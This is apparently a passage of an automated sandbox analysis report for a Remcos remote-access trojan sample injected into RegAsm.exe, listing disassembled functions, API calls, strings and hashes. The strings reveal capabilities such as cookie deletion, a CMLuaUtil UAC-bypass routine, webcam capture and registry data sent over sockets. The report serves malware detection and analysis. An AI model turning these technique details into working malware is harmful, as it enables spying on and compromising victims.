                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: D[E$D[E
                                • API String ID: 269201875-3695742444
                                • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumInfoOpenQuerysend
                                • String ID: xUG$NG$NG$TG
                                • API String ID: 3114080316-2811732169
                                • Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                • Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                • _wcslen.LIBCMT ref: 0041B763
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 37874593-122982132
                                • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                • API String ID: 1133728706-4073444585
                                • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                • _free.LIBCMT ref: 00450F48
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00450F53
                                • _free.LIBCMT ref: 00450F5E
                                • _free.LIBCMT ref: 00450FB2
                                • _free.LIBCMT ref: 00450FBD
                                • _free.LIBCMT ref: 00450FC8
                                • _free.LIBCMT ref: 00450FD3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastValue___vcrt_
                                • String ID:
                                • API String ID: 3852720340-0
                                • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                                  • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                • CoUninitialize.OLE32 ref: 00407629
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeObjectUninitialize_wcslen
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                • API String ID: 3851391207-1839356972
                                • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                • GetLastError.KERNEL32 ref: 0040BAE7
                                Strings
                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                • UserProfile, xrefs: 0040BAAD
                                • [Chrome Cookies not found], xrefs: 0040BB01
                                • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                • API String ID: 2018770650-304995407
                                • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                • AllocConsole.KERNEL32 ref: 0041CDA4
                                • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$AllocOutputShowWindow
                                • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                • API String ID: 2425139147-2278869229
                                • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                Download Yara Rule
                                APIs
                                • __allrem.LIBCMT ref: 0043AC69
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                • __allrem.LIBCMT ref: 0043AC9C
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                • __allrem.LIBCMT ref: 0043ACD1
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: H_prologSleep
                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                • API String ID: 3469354165-3054508432
                                • Opcode ID: 6f157006139ccf4b8d86a432b5633ede6fd06edeca8eb9c0ae1caa95c8564102
                                • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                • Opcode Fuzzy Hash: 6f157006139ccf4b8d86a432b5633ede6fd06edeca8eb9c0ae1caa95c8564102
                                • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                Function 00411CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                • GetNativeSystemInfo.KERNEL32(?), ref: 00411DA5
                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID:
                                • API String ID: 3950776272-0
                                • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __cftoe
                                • String ID:
                                • API String ID: 4189289331-0
                                • Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                • Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
                                • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                • String ID:
                                • API String ID: 493672254-0
                                • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • _free.LIBCMT ref: 0044824C
                                • _free.LIBCMT ref: 00448274
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • _abort.LIBCMT ref: 00448293
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ControlManager
                                • String ID:
                                • API String ID: 221034970-0
                                • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                                • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
